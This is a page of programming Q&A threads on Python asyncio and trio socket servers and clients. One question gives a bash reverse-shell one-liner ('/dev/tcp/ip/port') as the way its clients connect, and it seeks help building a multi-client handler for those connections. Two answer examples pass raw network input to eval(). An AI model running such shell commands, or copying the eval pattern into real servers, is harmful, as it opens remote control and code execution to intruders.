Python simple socket client/server using asyncio

I would like to re-implement my code using asyncio coroutines instead of multi-threading.
server.py
def handle_client(client):
    request = None
    while request != 'quit':
        request = client.recv(255).decode('utf8')
        response = cmd.run(request)
        client.send(response.encode('utf8'))
    client.close()

server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.bind(('localhost', 15555))
server.listen(8)

try:
    while True:
        client, _ = server.accept()
        threading.Thread(target=handle_client, args=(client,)).start()
except KeyboardInterrupt:
    server.close()
client.py
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.connect(('localhost', 15555))

request = None
try:
    while request != 'quit':
        request = input('>> ')
        if request:
            server.send(request.encode('utf8'))
            response = server.recv(255).decode('utf8')
            print(response)
except KeyboardInterrupt:
    server.close()
I know there are appropriate asynchronous network libraries for this. But I just want to use the core asyncio library in this case, in order to get a better understanding of it.
It would have been so nice to only have to add the async keyword before the handle_client definition... Here is a piece of code which seems to work, but I'm still confused about the implementation.
asyncio_server.py
def handle_client(client):
    request = None
    while request != 'quit':
        request = client.recv(255).decode('utf8')
        response = cmd.run(request)
        client.send(response.encode('utf8'))
    client.close()

def run_server(server):
    client, _ = server.accept()
    handle_client(client)

server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.bind(('localhost', 15555))
server.listen(8)

loop = asyncio.get_event_loop()
asyncio.async(run_server(server))
try:
    loop.run_forever()
except KeyboardInterrupt:
    server.close()
How do I adapt this in the best way, using the async and await keywords?

The closest literal translation of the threading code would create the socket as before, make it non-blocking, and use asyncio low-level socket operations to implement the server. Here is an example, sticking to the more relevant server part (the client is single-threaded and likely fine as-is):
import asyncio, socket

async def handle_client(client):
    loop = asyncio.get_event_loop()
    request = None
    while request != 'quit':
        request = (await loop.sock_recv(client, 255)).decode('utf8')
        response = str(eval(request)) + '\n'
        await loop.sock_sendall(client, response.encode('utf8'))
    client.close()

async def run_server():
    server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    server.bind(('localhost', 15555))
    server.listen(8)
    server.setblocking(False)

    loop = asyncio.get_event_loop()

    while True:
        client, _ = await loop.sock_accept(server)
        loop.create_task(handle_client(client))

asyncio.run(run_server())
The above works, but is not the intended way to use asyncio. It is very low-level and therefore error-prone, requiring you to remember to set the appropriate flags on the socket. Also, there is no buffering, so something as simple as reading a line from the client becomes a tiresome chore. This API level is really only intended for implementors of alternative event loops, which would provide their implementation of sock_recv, sock_sendall, etc.
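To make the buffering point concrete, here is a rough, purely illustrative sketch (not part of the original answer) of the bookkeeping a manual readline would need on top of loop.sock_recv, assuming the same non-blocking client socket as above:

import asyncio

async def sock_readline(loop, client, leftover=b'', max_len=4096):
    # Keep pulling chunks until a newline appears in our own buffer --
    # bookkeeping the streams API would otherwise handle for us.
    buffer = leftover
    while b'\n' not in buffer and len(buffer) < max_len:
        chunk = await loop.sock_recv(client, 255)
        if not chunk:            # peer closed the connection
            return buffer, b''
        buffer += chunk
    line, _, rest = buffer.partition(b'\n')
    return line, rest            # the caller must carry 'rest' into the next call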
Asyncio's public API provides two abstraction layers intended for consumption: the older transport/protocol layer modeled after Twisted, and the newer streams layer. In new code, you almost certainly want to use the streams API, i.e. call asyncio.start_server and avoid raw sockets. That significantly reduces the line count:
import asyncio, socket

async def handle_client(reader, writer):
    request = None
    while request != 'quit':
        request = (await reader.read(255)).decode('utf8')
        response = str(eval(request)) + '\n'
        writer.write(response.encode('utf8'))
        await writer.drain()
    writer.close()

async def run_server():
    server = await asyncio.start_server(handle_client, 'localhost', 15555)
    async with server:
        await server.serve_forever()

asyncio.run(run_server())
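For completeness, the client from the question could also be ported to the streams API. A minimal sketch (my illustration, not part of the original answer) using asyncio.open_connection might look like this, keeping the blocking input() call since the client handles only a single connection anyway:

import asyncio

async def run_client():
    reader, writer = await asyncio.open_connection('localhost', 15555)
    request = None
    while request != 'quit':
        request = input('>> ')  # blocking, but acceptable for a single-connection client
        if request:
            writer.write(request.encode('utf8'))
            await writer.drain()
            response = (await reader.read(255)).decode('utf8')
            print(response)
    writer.close()
    await writer.wait_closed()

asyncio.run(run_client())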

I have read the answers and comments above, trying to figure out how to use the asyncio lib for sockets.
As often happens with Python, the official documentation, along with its examples, is the best source of useful information.
I got an understanding of Transports and Protocols (the low-level API) and Streams (the high-level API) from the examples presented at the end of the documentation article.
For example, TCP Echo Server:
import asyncio

class EchoServerProtocol(asyncio.Protocol):
    def connection_made(self, transport):
        peername = transport.get_extra_info('peername')
        print('Connection from {}'.format(peername))
        self.transport = transport

    def data_received(self, data):
        message = data.decode()
        print('Data received: {!r}'.format(message))

        print('Send: {!r}'.format(message))
        self.transport.write(data)

        print('Close the client socket')
        self.transport.close()

async def main():
    # Get a reference to the event loop as we plan to use
    # low-level APIs.
    loop = asyncio.get_running_loop()

    server = await loop.create_server(
        lambda: EchoServerProtocol(),
        '127.0.0.1', 8888)

    async with server:
        await server.serve_forever()

asyncio.run(main())
and TCP Echo Client:
import asyncio

class EchoClientProtocol(asyncio.Protocol):
    def __init__(self, message, on_con_lost):
        self.message = message
        self.on_con_lost = on_con_lost

    def connection_made(self, transport):
        transport.write(self.message.encode())
        print('Data sent: {!r}'.format(self.message))

    def data_received(self, data):
        print('Data received: {!r}'.format(data.decode()))

    def connection_lost(self, exc):
        print('The server closed the connection')
        self.on_con_lost.set_result(True)

async def main():
    # Get a reference to the event loop as we plan to use
    # low-level APIs.
    loop = asyncio.get_running_loop()

    on_con_lost = loop.create_future()
    message = 'Hello World!'

    transport, protocol = await loop.create_connection(
        lambda: EchoClientProtocol(message, on_con_lost),
        '127.0.0.1', 8888)

    # Wait until the protocol signals that the connection
    # is lost and close the transport.
    try:
        await on_con_lost
    finally:
        transport.close()

asyncio.run(main())
Hope it helps someone searching for a simple explanation of asyncio.

Related

Keep indefinite connections open on TCP server with asyncio streams?

I'm trying to understand how to use asyncio streams for multiple connections that will keep sending messages until a predefined condition or a socket timeout is reached. Looking at the Python docs, they provide the following example of a TCP server based on asyncio streams:
import asyncio

async def handle_echo(reader, writer):
    data = await reader.read(100)
    message = data.decode()
    addr = writer.get_extra_info('peername')

    print(f"Received {message!r} from {addr!r}")

    print(f"Send: {message!r}")
    writer.write(data)
    await writer.drain()

    print("Close the connection")
    writer.close()

async def main():
    server = await asyncio.start_server(
        handle_echo, '127.0.0.1', 8888)

    addrs = ', '.join(str(sock.getsockname()) for sock in server.sockets)
    print(f'Serving on {addrs}')

    async with server:
        await server.serve_forever()

asyncio.run(main())
What I'm trying to do is more complex and it looks more like so (a lot of it is pseudocode, written in capital letters or with implementation omitted):
import asyncio

async def io_control(queue):
    while true:
        ...
        # do I/O control in this function ...

async def data_processing(queue):
    while true:
        ...
        # perform data handling

async def handle_data(reader, writer):
    data = await reader.read()
    message = data.decode()
    addr = writer.get_extra_info('peername')
    print(f"Received {message!r} from {addr!r}")
    #do stuff with a queue - pass messages to other two async functions as needed
    #keep open until something happens
    if(ERROR or SOCKET_TIMEOUT):
        writer.close()

async def server(queue):
    server = await asyncio.start_server(
        handle_data, '127.0.0.1', 8888)
    addrs = ', '.join(str(sock.getsockname()) for sock in server.sockets)
    print(f'Serving on {addrs}')
    async with server:
        await server.serve_forever()

async def main():
    queue_io = asyncio.Queue()
    queue_data = asyncio.Queue()
    asyncio.run(server(queue_data))
    asyncio.run(data_handling(queue_data))
    asyncio.run(io_control(queue_io))

asyncio.run(main())
Does this look feasible? I'm not used to working with coroutines (I'm coming from more of a multi-threading paradigm), so I'm not sure if what I'm doing is right or if I have to explicitly include yields or do any extra stuff.
If I understand correctly, you just need the TCP server to be able to handle multiple concurrent connections. The start_server function should already give you everything you need.
The first parameter client_connected_cb is a coroutine function called whenever a client establishes a connection. If you introduce a loop into that function (in your example code handle_data), you can keep the connection open until some criterion is met. What conditions exactly should lead to closing the connection is up to you, and the implementation details will obviously depend on that. The simplest approach I can imagine is something like this:
import asyncio
import logging

log = logging.getLogger(__name__)

async def handle_data(reader, writer):
    while True:
        data = (await reader.readline()).decode().strip()
        if not data:
            log.debug("client disconnected")
            break
        response = await your_data_processing_function(data)
        writer.write(response.encode())
        await writer.drain()

...

async def main():
    server = await asyncio.start_server(handle_data, '127.0.0.1', 8888)
    async with server:
        await server.serve_forever()

if __name__ == '__main__':
    asyncio.run(main())
There is theoretically no limit for the number of concurrent connections.
If your client_connected_cb is a coroutine function, each new connection will schedule a new task for the event loop. That is where the concurrency comes from. The magic then happens at the point of awaiting new data from the client; that is where the event loop can switch execution to another coroutine. All this happens behind the scenes, so to speak.
If you want to introduce a timeout, you could wrap the awaitable readline coroutine in wait_for, for example, and then catch the TimeoutError to exit the loop.
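For instance, a minimal sketch of that timeout handling (illustrative only: the 30-second value is an arbitrary assumption, log refers to the logger from the example above, and a simple echo stands in for your_data_processing_function) could look like this:

import asyncio

async def handle_data(reader, writer):
    while True:
        try:
            # Give the client at most 30 seconds (arbitrary) to send the next line.
            raw = await asyncio.wait_for(reader.readline(), timeout=30)
        except asyncio.TimeoutError:
            log.debug("client timed out")
            break
        data = raw.decode().strip()
        if not data:
            log.debug("client disconnected")
            break
        writer.write(f"got: {data}\n".encode())
        await writer.drain()
    writer.close()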
Hope this helps.

How do I switch between connected clients with asyncio sockets

I am trying to make a socket server that is able to have multiple clients connected using asyncio sockets, and that can easily switch between which client it communicates with while still keeping all the clients connected. I thought there would be some kind of FD for the clients like there is with plain sockets, but I looked through the docs and did not find anything, or I missed it.
Here is my server code:
import socket
import asyncio

host = "localhost"
port = 9998

list_of_auths = ['desktop-llpeu0p\\tomiss', 'desktop-llpeu0p\\tomisss',
                 'desktop-llpeu0p\\tomissss', 'desktop-llpeu0p\\tomisssss']

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print('socket initiated.')

confirmed = 'CONFIRMED'
deny = 'denied'

#(so i dont forget) to get recv in async do: var = (await reader.read(4096)).decode('utf-8') if -1 then it will read all
#(so i dont forget) to write sendall do: writer.write(var.encode('utf-8')) should be used with await writer.drain()

async def handle_client(reader, writer):
    idrecv = (await reader.read(255)).decode('utf-8')
    if idrecv in list_of_auths:
        writer.write(confirmed.encode('utf-8'))
    else:
        writer.write(deny.encode('utf-8'))
        writer.close()

    request = None
    while request != 'quit':
        print("second checkpoint")
    writer.close()

async def run_server():
    print("first checkpoint")
    server = await asyncio.start_server(handle_client, host, port)
    async with server:
        await server.serve_forever()

asyncio.run(run_server())
This code allows multiple clients to connect at once; however, it only lets me communicate with the last one that connected.
I would suggest implementing it like so:
import asyncio

class SocketHandler(asyncio.Protocol):
    def __init__(self):
        asyncio.Protocol.__init__(self)
        self.transport = None
        self.peername = None
        # your other code

    def connection_made(self, transport):
        """ incoming connection """
        global ALL_CONNECTIONS
        self.transport = transport
        self.peername = transport.get_extra_info('peername')
        ALL_CONNECTIONS.append(self)
        # your other code

    def connection_lost(self, exception):
        self.close()
        # your other code

    def data_received(self, data):
        # your code handling incoming data
        pass

    def close(self):
        try:
            self.transport.close()
        except AttributeError:
            pass

# global list to store all connections
ALL_CONNECTIONS = []

def send_to_all(message):
    """ sending a message to all connected clients """
    global ALL_CONNECTIONS
    for sh in ALL_CONNECTIONS:
        # here you can also check sh.peername to know which client it is
        if sh.transport is not None:
            sh.transport.write(message)

port = 5060
loop = asyncio.get_event_loop()
coro = loop.create_server(SocketHandler, '', port)
server = loop.run_until_complete(coro)
loop.run_forever()
This way, each connection to the server is represented by an instance of SocketHandler. Whenever you process some data inside this instance, you know which client connection it is.
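Building on that list, a small illustrative helper (send_to_one is my hypothetical name, not an existing API) for addressing a single client by its peername could look like this:

def send_to_one(peername, message):
    """ send a message only to the connected client whose peername matches """
    for sh in ALL_CONNECTIONS:
        if sh.peername == peername and sh.transport is not None:
            sh.transport.write(message)
            break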

How can I send socket asynchronously? [duplicate]


How can I accept new connection requests in the background?

I have a server which accepts connection requests from clients. Clients send connection requests using this command: bash -i > /dev/tcp/ip/port 0<&1 1>&1. I want my server to instantly accept new connection requests and log them to the console, but I don't know how. In the code below there is a while loop. As we can see, command_accept() needs to finish before client_accept() can start. That means I always need to enter some command before new client requests are accepted. I need client_accept() to always be running in the background.
I tried to set a time limit on my input, but that's not the solution I need. I also tried different libraries for asynchronous programming, though I'm not sure I'm using them correctly.
import socket
import time
import sys

host = '127.0.0.1'
port = 1344
id_counter = 0

server = socket.socket()
server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
server.settimeout(0.1)
server.bind((host, port))
server.listen()

clients = {}

def client_accept(server):
    while True:
        try:
            conn, addr = server.accept()
            global id_counter
            id_counter += 1
            clients[id_counter] = (conn, addr)
            print(f'{time.ctime()} New client [ID {id_counter}] with address {str(addr[0])}:{str(addr[1])}')
        except socket.timeout:
            break

def command_accept():
    command = input('server > ')
    #** don't pay attention **#
    if command == 'exit':
        sys.exit()
    else:
        print(f'command {command} accepted!')

while True:
    command_accept()
    client_accept(server)
Expected result: I don't pass anything to the input in command_accept, and yet if a new client sends a request, the server instantly accepts it and prints something like New client [ID 1] with address 127.0.0.1:45431.
Try doing that with socket.io and threading, so that when the socket gets an ON_CONNECT event you can just push the information into a list and print it to the console.
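As a rough sketch of that idea (assuming the plain-socket code from the question, and using threading rather than socket.io), the accept loop could run in a daemon thread while the command prompt keeps the main thread:

import threading

def accept_loop(server):
    # Background thread: keep accepting and logging clients as they arrive.
    while True:
        try:
            client_accept(server)  # reuses the function from the question
        except OSError:
            break                  # server socket was closed, stop accepting

threading.Thread(target=accept_loop, args=(server,), daemon=True).start()

while True:
    command_accept()               # the prompt no longer blocks new connections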
As an excuse to experiment with the trio async library, I ported your code to it.
Start by defining a simple class for client connections and the code to keep track of them:
from sys import stderr
from itertools import count

class Client:
    def __init__(self, stream):
        self.stream = stream

    async def run(self):
        lines = LineReader(self.stream)
        while True:
            line = (await lines.readline()).decode('ascii')
            if not line or line.strip().casefold() in {'quit', 'exit'}:
                await self.stream.send_all(b'bye!\r\n')
                break
            resp = f'got {line!r}'
            await self.stream.send_all(resp.encode('ascii') + b'\r\n')

CLIENT_COUNTER = count()
CLIENTS = {}

async def handle_client(stream):
    client_id = next(CLIENT_COUNTER)
    client = Client(stream)
    async with stream:
        CLIENTS[client_id] = client
        try:
            await client.run()
        except Exception as err:
            print('client failed', err, file=stderr)
        finally:
            del CLIENTS[client_id]
LineReader comes from here: https://stackoverflow.com/a/53576829/1358308
Next we can define the server's stdin processing:
async def handle_local(nursery):
    while True:
        try:
            command = await async_input('server > ')
        except EOFError:
            command = 'exit'
        if command == 'exit':
            nursery.cancel_scope.cancel()
        elif command == 'list':
            for id, client in CLIENTS.items():
                print(id, client.stream.socket.getpeername())
        else:
            print(f'unknown command {command!r}')
Check out the docs for info about nurseries.
This uses a utility function to wrap input up into an async function:
import trio

async def async_input(prompt=None):
    return await trio.run_sync_in_worker_thread(
        input, prompt, cancellable=True)
Then we define code to tie all the pieces together:
SERVE_HOST = 'localhost'
SERVE_PORT = 1344

async def async_main():
    async with trio.open_nursery() as nursery:
        nursery.start_soon(handle_local, nursery)
        await trio.serve_tcp(
            handle_client,
            port=SERVE_PORT, host=SERVE_HOST,
            handler_nursery=nursery)

trio.run(async_main)
Some more links/references (by trio's author):
tutorial echo server
motivation behind the trio library

Pythonic asyncio communication with unreliable servers

Is there a standard pattern for using asyncio to poll intermittent servers?
Take the following example: a client that reads every second from an unreliable TCP server. Without error handling, the async/await notation looks great:
import asyncio

class BasicTCPClient(object):
    """TCP client without error handling."""
    def __init__(self, ip, port):
        self.ip = ip
        self.port = port

    async def connect(self):
        reader, writer = await asyncio.open_connection(self.ip, self.port)
        self.connection = {'reader': reader, 'writer': writer}

    async def get(self, request):
        self.connection['writer'].write(request.encode())
        return await self.connection['reader'].readuntil(b'\n')

async def read():
    client = BasicTCPClient('ip', 8000)
    await client.connect()
    while True:
        print(await client.get('request'))
        await asyncio.sleep(1)

ioloop = asyncio.get_event_loop()
try:
    ioloop.run_until_complete(read())
except KeyboardInterrupt:
    pass
But this doesn't handle disconnecting/reconnecting well. I have a working solution, but it's approaching 100 LOC and negates all the elegance of async/await.
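For illustration only (this is not an answer from the thread), a rough sketch of the kind of reconnecting wrapper the question alludes to, built on the BasicTCPClient above, might look like this:

import asyncio

class ReconnectingTCPClient(BasicTCPClient):
    """Illustrative sketch: retry a request once after reconnecting on failure."""

    async def get(self, request, retry_delay=1):
        for attempt in range(2):
            try:
                return await super().get(request)
            except (ConnectionError, asyncio.IncompleteReadError, AttributeError):
                # The connection is gone (or was never made): back off, then reconnect.
                await asyncio.sleep(retry_delay)
                try:
                    await self.connect()
                except OSError:
                    pass  # server still unreachable, let the next attempt fail
        raise ConnectionError('server unavailable after retrying')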

Categories

Resources